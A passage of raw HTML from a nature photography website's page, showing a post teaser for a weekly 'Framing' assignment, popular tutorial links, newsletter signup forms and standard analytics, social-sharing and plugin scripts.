href='https://www.naturettl.com/weekly-photography-assignment-framing/'>Weekly Photography Assignment: Framing</a></h2> <div class="post__description"> <p>Each week we’ll be giving you a theme that you can submit a photo for, and we’ll choose&nbsp;our...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/nature-ttl/">Nature TTL</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/weekly-photography-assignment-framing/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14696"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_7576101 print-no" id="essb_displayed_shortcode_7576101" data-essb-postid="14696" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/weekly-photography-assignment-framing/" data-essb-twitter-url="https://www.naturettl.com/weekly-photography-assignment-framing/" data-essb-instance="7576101"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Weekly Photography Assignment: Framing&amp;link=https://www.naturettl.com/weekly-photography-assignment-framing/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/framing.jpg" title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Weekly Photography Assignment: Framing&amp;link=https://www.naturettl.com/weekly-photography-assignment-framing/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/framing.jpg&#39;,&#39;facebook_advanced&#39;,&#39;7576101&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Weekly Photography Assignment: Framing&amp;url=https://www.naturettl.com/weekly-photography-assignment-framing/&amp;counturl=https://www.naturettl.com/weekly-photography-assignment-framing/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;7576101&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/weekly-photography-assignment-framing/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/weekly-photography-assignment-framing/&#39;,&#39;google&#39;,&#39;7576101&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article> <div id="ajax-load-more" class="ajax-load-more-wrap default" data-alm-id="" data-canonical-url="https://www.naturettl.com/" data-slug="home" data-post-id="0"><div class="alm-listing alm-ajax" data-container-type="div" data-repeater="template_2" data-post-type="post" data-order="DESC" data-orderby="date" data-offset="7" data-posts-per-page="5" data-scroll="false" data-pause="false" data-button-label="Older Posts" data-button-loading-label="Loading Posts..." data-transition="fade" data-images-loaded="true"></div><div class="alm-btn-wrap" style="visibility: hidden;"><button class="alm-load-more-btn more " rel="next">Older Posts</button></div></div> </div> <div class="col-md-4 col-sm-12"> <section class="widget-odd widget-first widget-1 Widget wpp-2 popular-posts" id="wpp-2"> <header class="Widget__header"><h3 class="Widget__title">Popular Tutorials</h3></header> <article class="post post--sidebar"> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/photograph-reptiles-uk/" title="How to Photograph Reptiles in the UK" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/14424-featured-173x110.jpg" width="173" height="110" alt="How to Photograph Reptiles in the UK" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/photograph-reptiles-uk/" title="How to Photograph Reptiles in the UK" class="wpp-post-title" target="_self">How to Photograph Reptiles in the UK</a></h4></div> </div> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/upload-photos-facebook-best-quality-possible/" title="How to Upload Photos to Facebook at the Best Quality Possible" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/6321-featured-173x110.jpg" width="173" height="110" alt="How to Upload Photos to Facebook at the Best Quality Possible" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/upload-photos-facebook-best-quality-possible/" title="How to Upload Photos to Facebook at the Best Quality Possible" class="wpp-post-title" target="_self">How to Upload Photos to Facebook at the Best Quality Possible</a></h4></div> </div> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/best-camera-landscape-photography/" title="What&#8217;s the Best Camera for Landscape Photography?" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/9135-featured-173x110.jpg" width="173" height="110" alt="What&#039;s the Best Camera for Landscape Photography?" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/best-camera-landscape-photography/" title="What&#8217;s the Best Camera for Landscape Photography?" class="wpp-post-title" target="_self">What&#8217;s the Best Camera for Landscape Photography?</a></h4></div> </div> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/how-to-photograph-bluebells/" title="How to Photograph Bluebells" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/14609-featured-173x110.jpg" width="173" height="110" alt="How to Photograph Bluebells" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/how-to-photograph-bluebells/" title="How to Photograph Bluebells" class="wpp-post-title" target="_self">How to Photograph Bluebells</a></h4></div> </div> </article> </section> <section class="widget-even widget-2 hidden-xs Widget text-5 widget_text" id="text-5"><header class="Widget__header"><h3 class="Widget__title">Stay Updated</h3></header> <div class="textwidget"><div class="Widget--email Widget--dynamic hidden-xs"> <p class="_text">Don't miss the best of Nature TTL</p> <div role="form" class="wpcf7" id="wpcf7-f726-o3" lang="en-GB" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f726-o3" method="post" class="wpcf7-form email-signup-form mailchimp-ext-0.4.51" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="726" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_GB" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f726-o3" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="form-group"> <label for="email" class="sr-only">Email Address</label><br /> <span class="wpcf7-form-control-wrap email"><input type="email" name="email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email _input" aria-required="true" aria-invalid="false" placeholder="Your E-mail" /></span> </div> <p><input type="submit" value="Sign me up" class="wpcf7-form-control wpcf7-submit _btn btn-green btn btn-block" /></p> <div class="wpcf7-response-output wpcf7-display-none"></div><p style="display: none !important"><span class="wpcf7-form-control-wrap referer-page"><input type="hidden" name="referer-page" value="direct visit" class="wpcf7-form-control wpcf7-text referer-page" aria-invalid="false"></span></p> </form></div> <p class="small">We'll never share your details with anyone.</p> </div></div> </section> <section class="widget-odd widget-last widget-3 Widget wpp-3 popular-posts" id="wpp-3"> <header class="Widget__header"><h3 class="Widget__title">Up Next</h3></header> <article class="post post--sidebar"> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/" title="Comedy Wildlife Photo Awards 2019 &#8211; Best Entries So Far!" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/14704-featured-173x110.jpg" width="173" height="110" alt="Comedy Wildlife Photo Awards 2019 - Best Entries So Far!" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/" title="Comedy Wildlife Photo Awards 2019 &#8211; Best Entries So Far!" class="wpp-post-title" target="_self">Comedy Wildlife Photo Awards 2019 &#8211; Best Entries So Far!</a></h4></div> </div> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/photograph-reptiles-uk/" title="How to Photograph Reptiles in the UK" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/14424-featured-173x110.jpg" width="173" height="110" alt="How to Photograph Reptiles in the UK" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/photograph-reptiles-uk/" title="How to Photograph Reptiles in the UK" class="wpp-post-title" target="_self">How to Photograph Reptiles in the UK</a></h4></div> </div> <div class="row"> <div class="col-xs-6"><a href="https://www.naturettl.com/best-camera-landscape-photography/" title="What&#8217;s the Best Camera for Landscape Photography?" target="_self"><img src="https://www.naturettl.com/wp-content/uploads/wordpress-popular-posts/9135-featured-173x110.jpg" width="173" height="110" alt="What&#039;s the Best Camera for Landscape Photography?" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a></div> <div class="col-xs-6"><h4 class="post__title"><a href="https://www.naturettl.com/best-camera-landscape-photography/" title="What&#8217;s the Best Camera for Landscape Photography?" class="wpp-post-title" target="_self">What&#8217;s the Best Camera for Landscape Photography?</a></h4></div> </div> </article> </section> </div> </div> </div> <script id="dsq-count-scr" src="//naturettl.disqus.com/count.js" async></script> </main> <footer class="Site-footer"> <div class="container"> <div class="row"> <div class="col-sm-3 hidden-xs"> <h5 class="Site-footer__title">Categories</h5> <ul class="list-unstyled Site-footer__list"> <li><a href="/photography-tutorials" class="_item">Tutorials</a></li> <li><a href="/inspiration" class="_item">Inspiration</a></li> <li><a href="/equipment" class="_item">Equipment</a></li> <li><a href="/postproduction" class="_item">Post Production</a></li> </ul> </div> <div class="col-sm-3 col-xs-12"> <h5 class="Site-footer__title">Useful Links</h5> <ul class="list-unstyled Site-footer__list"> <li><a href="/about-nature-ttl" class="_item">About Us</a></li> <li><a href="/contact-us" class="_item">Contact Us</a></li> <li><a href="/advertise-with-nature-ttl" class="_item">Advertise With Us</a></li> <li><a href="/support/" class="_item">Support Nature TTL</a></li> <li><a href="/privacy/" class="_item">Privacy Policy</a></li> </ul> </div> <div class="col-sm-3"> <h5 class="Site-footer__title">Newsletter Signup</h5> <div role="form" class="wpcf7" id="wpcf7-f6636-o4" lang="en-GB" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f6636-o4" method="post" class="wpcf7-form Site-footer__form mailchimp-ext-0.4.51" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="6636" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_GB" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f6636-o4" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="_group"> <span class="wpcf7-form-control-wrap email"><input type="email" name="email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-email _input" aria-invalid="false" placeholder="Your E-mail" /></span><br /> <button type="submit" class="_button btn btn-green"><i class="fa fa-angle-right" aria-hidden="true"></i></button> </div> <div class="wpcf7-response-output wpcf7-display-none"></div><p style="display: none !important"><span class="wpcf7-form-control-wrap referer-page"><input type="hidden" name="referer-page" value="direct visit" class="wpcf7-form-control wpcf7-text referer-page" aria-invalid="false"></span></p> </form></div> <ul class="Site-footer__social list-inline"> <li><a href="http://twitter.com/naturettl" target="_blank"><i class="fa fa-twitter"></i></a></li> <li><a href="https://facebook.com/naturettl" target="_blank"><i class="fa fa-facebook"></i></a></li> <li><a href="http://naturettl.com/rss"><i class="fa fa-rss"></i></a></li> </ul> </div> </div> <div class="col-sm-3 hidden-xs"> </div> <div class="divider divider--muted clearfix"></div> <div class="row"> <div class="col-xs-6"> <p class="Site-footer__copyright">&copy; Nature TTL 2014 - 2019. All Rights Reserved</p> </div> <div class="col-xs-6"> <a href="#" id="back-to-top" class="Site-footer__up">Top <i class="fa fa-angle-up"></i></a> </div> </div> </div> </footer> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_GB/all.js#xfbml=1&appId=216635771720716"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script>(function() { var _fbq = window._fbq || (window._fbq = []); if (!_fbq.loaded) { var fbds = document.createElement('script'); fbds.async = true; fbds.src = '//connect.facebook.net/en_US/fbds.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(fbds, s); _fbq.loaded = true; } _fbq.push(['addPixelId', '657929320966588']); })(); window._fbq = window._fbq || []; window._fbq.push(['track', 'PixelInitialized', {}]); </script> <noscript><img height="1" width="1" alt="" style="display:none" src="https://www.facebook.com/tr?id=657929320966588&ev=NoScript" /></noscript><div class="Menu-overlay"> <div class="container"> <div class="row"> <div class="col-sm-3 col-xs-12"> <h2 class="Menu-overlay__title">Free nature photography tutorials, inspirational features and gear reviews.</h2></div> <div class="col-sm-6 col-sm-offset-1 col-xs-12 col-border"> <h4 class="Menu-overlay__subtitle">More Nature TTL</h4> <div class="row"> <ul class="list-unstyled Menu-overlay__list"> <li class="col-sm-4"><a href="/shop" class="_item">Shop</a></li> <li class="col-sm-4"><a href="/about-nature-ttl" class="_item">About Us</a></li> <li class="col-sm-4"><a href="/contact-us" class="_item">Contact Us</a></li> <li class="col-sm-4"><a href="/advertise-with-nature-ttl" class="_item">Advertise With Us</a></li> <li class="col-sm-4"><a href="/support" class="_item">Support Us</a></li> </ul> </div> </div> <div class="col-sm-1 col-sm-offset-1"> <button class="close-overlay" type="button"><img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_close.png" alt="Close Overlay"></button> </div> </div> <div class="Menu-overlay__row"> <div class="Menu-overlay__col"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_tutorials.png" alt="Tutorials" class="_icon"> <h5 class="_title">Tutorials</h5> <ul class="list-unstyled Menu-overlay__list"> <li><a href="https://www.naturettl.com/photography-tutorials/basics" class="_item">Basics</a></li> <li><a href="https://www.naturettl.com/photography-tutorials/landscape-tutorials" class="_item">Landscape</a></li> <li><a href="https://www.naturettl.com/photography-tutorials/wildlife-tutorials" class="_item">Wildlife</a></li> <li><a href="https://www.naturettl.com/photography-tutorials/macro/" class="_item">Macro</a></li> </ul> </div> <div class="Menu-overlay__col"><img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_equipment.png" alt="Equipment" class="_icon"> <h5 class="_title">Equipment</h5> <ul class="list-unstyled Menu-overlay__list"> <li><a href="https://www.naturettl.com/equipment/equipment-news/" class="_item">News</a></li> <li><a href="https://www.naturettl.com/equipment/equipment-tutorials/" class="_item">Tutorials</a></li> <li><a href="https://www.naturettl.com/equipment/reviews/" class="_item">Reviews</a></li> </ul> </div> <div class="Menu-overlay__col"><img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_inspiration.png" alt="Inspiration" class="_icon"> <h5 class="_title">Inspiration</h5> <ul class="list-unstyled Menu-overlay__list"> <li><a href="https://www.naturettl.com/inspiration/landscape-inspiration/" class="_item">Landscape</a></li> <li><a href="https://www.naturettl.com/inspiration/opinion/" class="_item">Opinion</a></li> <li><a href="https://www.naturettl.com/inspiration/wildlife-inspiration/" class="_item">Wildlife</a></li> </ul> </div> <div class="Menu-overlay__col"><img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_production.png" alt="Post Production" class="_icon"> <h5 class="_title">Post Production</h5> <ul class="list-unstyled Menu-overlay__list"> <li><a href="https://www.naturettl.com/postproduction/lightroom/" class="_item">Lightroom</a></li> <li><a href="https://www.naturettl.com/postproduction/photoshop/" class="_item">Photoshop</a></li> </ul> </div> <div class="Menu-overlay__col"><img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_general.png" alt="General" class="_icon"> <h5 class="_title">General</h5> <ul class="list-unstyled Menu-overlay__list"> <li><a href="https://www.naturettl.com/general/news/" class="_item">News</a></li> <li><a href="https://www.naturettl.com/general/interesting/" class="_item">Interesting</a></li> </ul> </div> </div> <div class="divider divider--muted divider--bottom"></div> <footer class="Menu-overlay__footer"> <div class="row"> <div class="col-sm-6"> <p>&copy; Nature TTL 2014 - 2019. All Rights Reserved</p> </div> <div class="col-sm-6"> <ul class="list-inline social-list"> <li><a href="http://www.twitter.com/NatureTTL" class="_item"><i class="fa fa-twitter"></i></a></li> <li><a href="https://www.facebook.com/NatureTTL" class="_item"><i class="fa fa-facebook"></i></a></li> <li><a href="http://feeds.feedburner.com/NatureTTL" class="_item"><i class="fa fa-rss"></i></a></li> </ul> </div> </div> </footer> </div> </div><div id="om-sicm9lczbpm7hkelptcv-holder"></div><script>var sicm9lczbpm7hkelptcv,sicm9lczbpm7hkelptcv_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){sicm9lczbpm7hkelptcv_poll(function(){if(window['om_loaded']){if(!sicm9lczbpm7hkelptcv){sicm9lczbpm7hkelptcv=new OptinMonsterApp();return sicm9lczbpm7hkelptcv.init({"u":"7197.654485","staging":0,"dev":0,"beta":0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="https://a.optmstr.com/app/js/api.min.js",o.async=true,o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;sicm9lczbpm7hkelptcv=new OptinMonsterApp();sicm9lczbpm7hkelptcv.init({"u":"7197.654485","staging":0,"dev":0,"beta":0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><div id="om-gzmytoqsbb5wm2kvxt4q-holder"></div><script>var gzmytoqsbb5wm2kvxt4q,gzmytoqsbb5wm2kvxt4q_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){gzmytoqsbb5wm2kvxt4q_poll(function(){if(window['om_loaded']){if(!gzmytoqsbb5wm2kvxt4q){gzmytoqsbb5wm2kvxt4q=new OptinMonsterApp();return gzmytoqsbb5wm2kvxt4q.init({"u":"7197.647082","staging":0,"dev":0,"beta":0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="https://a.optmstr.com/app/js/api.min.js",o.async=true,o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;gzmytoqsbb5wm2kvxt4q=new OptinMonsterApp();gzmytoqsbb5wm2kvxt4q.init({"u":"7197.647082","staging":0,"dev":0,"beta":0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><div id="om-tw6bmivdpmx3otfg-holder"></div><script>var tw6bmivdpmx3otfg,tw6bmivdpmx3otfg_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){tw6bmivdpmx3otfg_poll(function(){if(window['om_loaded']){if(!tw6bmivdpmx3otfg){tw6bmivdpmx3otfg=new OptinMonsterApp();return tw6bmivdpmx3otfg.init({"u":"7197.548878","staging":0,"dev":0,"beta":0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="https://a.optmstr.com/app/js/api.min.js",o.async=true,o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;tw6bmivdpmx3otfg=new OptinMonsterApp();tw6bmivdpmx3otfg.init({"u":"7197.548878","staging":0,"dev":0,"beta":0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script> <script type="text/javascript">var sicm9lczbpm7hkelptcv_shortcode = true;var gzmytoqsbb5wm2kvxt4q_shortcode = true;var tw6bmivdpmx3otfg_shortcode = true;</script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.naturettl.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"naturettl"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17'></script> <script type='text/javascript' src='https://checkout.stripe.com/checkout.js'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/vendor/accounting.min.js?ver=2.5.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/vendor/parsley.min.js?ver=2.5.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/vendor/moment.min.js?ver=2.5.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/vendor/pikaday.min.js?ver=2.5.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/vendor/pikaday.jquery.js?ver=2.5.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var simplePayFrontendGlobals = {"ajaxurl":"https:\/\/www.naturettl.com\/wp-admin\/admin-ajax.php","nonce":"93f27d4fbc","paymentSubmittingButtonLabel":"Please wait...","couponAmountOffText":"off","zeroAmountCheckoutButtonLabel":"Start Now","zeroDecimalCurrencies":["BIF","CLP","DJF","GNF","JPY","KMF","KRW","MGA","PYG","RWF","VND","VUV","XAF","XOF","XPF"],"scriptDebug":"false"}; var simplePayFormSettings = null; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/js/pro-public.min.js?ver=2.5.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var simplePaySubscriptionsFrontendGlobals = {"intervalEveryText":"every","trialCheckoutButtonLabel":"Start Free Trial"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe-subscriptions-add-on/assets/js/sub-public.min.js?ver=1.3.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/easy-social-share-buttons3/assets/js/essb-core.js?ver=6.1.1'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/lazy-load/js/jquery.sonar.min.js?ver=0.6.1'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/lazy-load/js/lazy-load.js?ver=0.6.1'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.1.6'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/easy-fancybox/js/jquery.fancybox.1.3.23.min.js'></script> <script type='text/javascript'> var fb_timeout, fb_opts={'overlayShow':true,'hideOnOverlayClick':true,'showCloseButton':true,'margin':20,'centerOnScroll':false,'enableEscapeButton':true,'autoScale':true }; if(typeof easy_fancybox_handler==='undefined'){ var easy_fancybox_handler=function(){ jQuery('.nofancybox,a.wp-block-file__button,a.pin-it-button,a[href*="pinterest.com/pin/create"],a[href*="facebook.com/share"],a[href*="twitter.com/share"]').addClass('nolightbox'); /* IMG */ var fb_IMG_select='a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a),area[href*=".jpg"]:not(.nolightbox),a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a),area[href*=".jpeg"]:not(.nolightbox),a[href*=".png"]:not(.nolightbox,li.nolightbox>a),area[href*=".png"]:not(.nolightbox),a[href*=".webp"]:not(.nolightbox,li.nolightbox>a),area[href*=".webp"]:not(.nolightbox)'; jQuery(fb_IMG_select).addClass('fancybox image'); var fb_IMG_sections=jQuery('.gallery,.wp-block-gallery,.tiled-gallery'); fb_IMG_sections.each(function(){jQuery(this).find(fb_IMG_select).attr('rel','gallery-'+fb_IMG_sections.index(this));}); jQuery('a.fancybox,area.fancybox,li.fancybox a').each(function(){jQuery(this).fancybox(jQuery.extend({},fb_opts,{'transitionIn':'elastic','easingIn':'easeOutBack','transitionOut':'elastic','easingOut':'easeInBack','opacity':false,'hideOnContentClick':false,'titleShow':true,'titlePosition':'over','titleFromAlt':true,'showNavArrows':true,'enableKeyboardNav':true,'cyclic':false}))});}; jQuery('a.fancybox-close').on('click',function(e){e.preventDefault();jQuery.fancybox.close()}); }; var easy_fancybox_auto=function(){setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);}; jQuery(easy_fancybox_handler);jQuery(document).on('post-load',easy_fancybox_handler); jQuery(easy_fancybox_auto); </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/easy-fancybox/js/jquery.easing.1.4.1.min.js'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.3.1.13.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"300","intent_interval":"100","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"959","accessible":"on","retractor_display_strategy":"responsive","touch_off_close":"on","submenu_indicator_close_mobile":"on","collapse_after_scroll":"on","v":"3.5","configurations":["main"],"ajax_url":"https:\/\/www.naturettl.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/www.naturettl.com\/wp-content\/plugins\/ubermenu\/","disable_mobile":"off","prefix_boost":"","aria_role_navigation":"off","aria_expanded":"off","aria_hidden":"off","aria_controls":"","aria_responsive_toggle":"off","icon_tag":"i","theme_locations":{"primary_navigation":"Primary Navigation","mobile_navigation":"Mobile Navigation"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/ubermenu/assets/js/ubermenu.min.js?ver=3.5'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/themes/naturettl/dist/scripts/main.js'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var alm_localize = {"ajaxurl":"https:\/\/www.naturettl.com\/wp-admin\/admin-ajax.php","alm_nonce":"6ba8e367a9","pluginurl":"https:\/\/www.naturettl.com\/wp-content\/plugins\/ajax-load-more","scrolltop":"false","display_results":"Showing {num} of {total} results","ajax_object":{"is_single":true,"is_singular":true}}; var ajax_load_more_vars = {"id":"ajax-load-more"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/ajax-load-more/core/dist/js/ajax-load-more.min.js?ver=5.0.1'></script> <link rel="stylesheet" id="essb-cct-style" href="https://www.naturettl.com/wp-content/plugins/easy-social-share-buttons3/lib/modules/click-to-tweet/assets/css/styles.css" type="text/css" media="all" /><script type="text/javascript">var essb_handle_stats = function(oService, oPostID, oInstance) { var element = jQuery('.essb_'+oInstance); var instance_postion = jQuery(element).attr("data-essb-position") || ""; var instance_template = jQuery(element).attr("data-essb-template") || ""; var instance_button = jQuery(element).attr("data-essb-button-style") || ""; var instance_counters = jQuery(element).hasClass("essb_counters") ? true : false; var instance_nostats = jQuery(element).hasClass("essb_nostats") ? true : false; if (instance_nostats) { return; } var instance_mobile = false; if( (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i).test(navigator.userAgent) ) { instance_mobile = true; } if (typeof(essb_settings) != "undefined") { jQuery.post(essb_settings.ajax_url, { 'action': 'essb_stat_log', 'post_id': oPostID, 'service': oService, 'template': instance_template, 'mobile': instance_mobile, 'position': instance_postion, 'button': instance_button, 'counter': instance_counters, 'nonce': essb_settings.essb3_nonce }, function (data) { if (data) { }},'json'); } }; var essb_log_stats_only = function(service, postId, position) { var instance_mobile = false; if( (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i).test(navigator.userAgent) ) { instance_mobile = true; } if (typeof(essb_settings) != "undefined") { jQuery.post(essb_settings.ajax_url, { 'action': 'essb_stat_log', 'post_id': postId, 'service': service, 'template': position, 'mobile': instance_mobile, 'position': position, 'button': position, 'counter': false, 'nonce': essb_settings.essb3_nonce }, function (data) { if (data) { }},'json'); } };</script> <script type="text/javascript">var omapi_localized = { ajax: 